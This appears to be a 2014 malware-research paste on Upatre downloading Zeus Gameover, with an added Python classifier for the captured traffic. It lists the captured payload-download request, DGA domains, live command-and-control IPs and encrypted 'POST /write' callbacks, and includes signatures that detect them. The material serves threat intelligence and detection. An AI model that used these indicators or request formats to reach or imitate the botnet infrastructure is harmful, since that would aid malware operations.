- // #MalwareMustDie!
- // Case: Upatre downloading Zeus Gameover (GMO)
- // Detected new alive (front end) CNC in 192.210.237.212
- // @unixfreaxjp /malware/checkdomains]$ date
- Wed Mar 26 19:52:24 JST 2014
- Upatre Sample: https://www.virustotal.com/en/file/1c3a24492f53fa16107f2ec01294bf188c32dc6c7a407a814b76685e4176a71a/analysis/1395828639/
- ZGMO sample: https://www.virustotal.com/en/file/e5270d906ef13a91e176cf60473747e5bf91bc60fe457dd0f3201a5f51cf6524/analysis/1395830427/
- ZGMO Polymorphic drop: https://www.virustotal.com/en/file/4f1f5242b6cf599220bcf642c7a3bd2f42739445bef5bf13b30c67ebbeeb5d64/analysis/1395830452/
- ZGMO Necurs rootkit: https://www.virustotal.com/en/file/f1473d776bca32df38f449b5e4e82bdc58825aabf5b5ab03f02e0b3caaf2a661/analysis/
- // Upatre downloads from 91.103.220.155
- ( Wed Mar 26 19:26:33 JST 2014|91.103.220.155|no-dns.dataflame.co.uk.|29550 | 91.103.216.0/21 | SIMPLYTRANSIT | GB | DATAFLAME.CO.UK | DATAFLAME INTERNET SERVICES LTD )
- GET /wp-content/uploads/2014/03/2103UKp.qta HTTP/1.1
- Accept: text/*, application/*
- User-Agent: Updates downloader
- Host: premiercrufinewine.co.uk
- Cache-Control: no-cache
- HTTP/1.1 200 OK
- Date: Wed, 26 Mar 2014 09:57:22 GMT
- Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 mod_qos/10.10
- Last-Modified: Fri, 21 Mar 2014 06:12:05 GMT
- ETag: "e1314-79e34-4f517c3d02e2a"
- Accept-Ranges: bytes
- Content-Length: 499252
- Content-Type: text/plain
- ZZP.A. (REDACTED)
- // ZGMO DGA:
- hyvguwdisgtkfjvpzrshijmjmngu.info
- vsskfudeqsorzhhawghonhknp.ru
- zttwocyqkpdegqgiytvcxphhy.biz
- mftodqwheaiozkbzduwjzydwkonv.com
- pvdlcaxlflgavwmfzvgcqhafm.com
- swskvaylddwvkhursjhbyx.org
- rccicerggqhswvgwolryhvsgqwsxvs.net
- aulbbiwslxpvvphxnjij.biz
- uoxztdipjzppjdpyttxcjrdiz.ru
- zzgezdvwtwyhypfqhytcjraygqp.com
- gugquwcumizhgyibbaqobajfvolbh.info
- // ZGMO Callbacks ALIVE domains:
- aulbbiwslxpvvphxnjij.biz,50.116.4.71, DNS1.REGISTRAR-SERVERS.COM
- mftodqwheaiozkbzduwjzydwkonv.com,192.210.237.212,DNS1.REGISTRAR-SERVERS.COM
- // ZGMO Callbacks:
- // callback 1 to 50.116.4.71
- ( Wed Mar 26 19:24:28 JST 2014|50.116.4.71|li430-71.members.linode.com.|6939 | 50.116.0.0/20 | HURRICANE | US | LINODE.COM | LINODE )
- POST /write HTTP/1.1
- Host: default
- Accept-Encoding:
- Connection: close
- Content-Length: 328
- X-ID: 5555
- .3....l.u.\...v.Y%.kH.......U.v.a.V..\..Pb.%....e..
- .....'...'...Ve.F\e.E'b.2T`.AVe.G]g.4R..E#a.@Rl.A]e.
- f.................?.h.\N.......}.e.Xg...............
- Ud.E2..h.......!...!...io.vhj.vhU.vhU.vhU.vhU.vhU.vh
- U.vhk...............jo.Gk`.vk ..9E.vkm.............lW
- .|nU.vmU.qio.......'...'...nU.voT.vnU..jT..
- .U.voU.voU.voU.voU...U.
- // callback 2 to 192.210.237.212
- ( Wed Mar 26 19:25:04 JST 2014|192.210.237.212|host.colocrossing.com.|36352 | 192.210.236.0/22 | AS-COLOCROSSING | US | NWNX.NET | NEW WAVE NETCONNECT LLC )
- POST /write HTTP/1.1
- Host: default
- Accept-Encoding:
- Connection: close
- Content-Length: 328
- X-ID: 5555
- .uj......Z..Lp=..N.H..............r}.E..!J..F#re.......
- '...'...V...\...'...T...V...]...R...#...R...]..f.......
- .........:U.h.6.._...Z......g...............U...2..h...
- ....!...!...i...h...h...h...h...h...h...h...hk.........
- ......jih.k1..kf.Z9...km.............l...n...m...io....
- ...'...'...n...o...n..hj..t....o...o...o...o..t...
- #MalwareMustDie!!
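Added example (not part of the original paste): a small request parser and classifier for the two HTTP patterns captured above, the Upatre payload fetch (fixed "Updates downloader" User-Agent, wildcard Accept) and the Zeus GMO "POST /write" callback ("Host: default", empty Accept-Encoding, numeric X-ID). The sample requests are constructed from the header lines on the page; the binary POST body is left out, and the benign request is invented for comparison.

```python
# Added example, not part of the original paste: parse raw HTTP request
# heads and flag the Upatre download and Zeus GMO callback patterns seen
# in this note. Sample requests are constructed from the page's captures.
from typing import Optional

UPATRE_REQUEST = """GET /wp-content/uploads/2014/03/2103UKp.qta HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: premiercrufinewine.co.uk
Cache-Control: no-cache
"""

ZGMO_CALLBACK = """POST /write HTTP/1.1
Host: default
Accept-Encoding:
Connection: close
Content-Length: 328
X-ID: 5555
"""

# Constructed benign request, used only to show a non-match.
BENIGN_REQUEST = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Accept: text/html
"""


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request head into method, path and lower-cased headers."""
    lines = raw.strip().splitlines()
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def classify_request(raw: str) -> Optional[str]:
    """Return a label for a known-bad request shape, or None."""
    req = parse_request(raw)
    h = req["headers"]
    # Upatre: non-browser User-Agent plus the wildcard Accept header,
    # fetching its payload from a web site's uploads directory.
    if (req["method"] == "GET"
            and h.get("user-agent") == "Updates downloader"
            and h.get("accept") == "text/*, application/*"):
        return "upatre-download"
    # Zeus GMO callback: POST /write with the literal 'Host: default',
    # an empty Accept-Encoding header and a numeric X-ID.
    if (req["method"] == "POST" and req["path"] == "/write"
            and h.get("host") == "default"
            and h.get("accept-encoding") == ""
            and h.get("x-id", "").isdigit()):
        return "zgmo-callback"
    return None


def scan_capture(requests) -> list:
    """Return (label, host, path) for every request that matches a pattern."""
    hits = []
    for raw in requests:
        label = classify_request(raw)
        if label:
            req = parse_request(raw)
            hits.append((label, req["headers"].get("host", ""), req["path"]))
    return hits


if __name__ == "__main__":
    for hit in scan_capture([UPATRE_REQUEST, ZGMO_CALLBACK, BENIGN_REQUEST]):
        print(hit)
```

The two callbacks on the page carry the same X-ID (5555) and Content-Length (328) against different CNC hosts, so the header shape rather than the destination IP is the stable thing to match; the resolved DNS of the two alive DGA domains will change, the POST shape is what the client code emits.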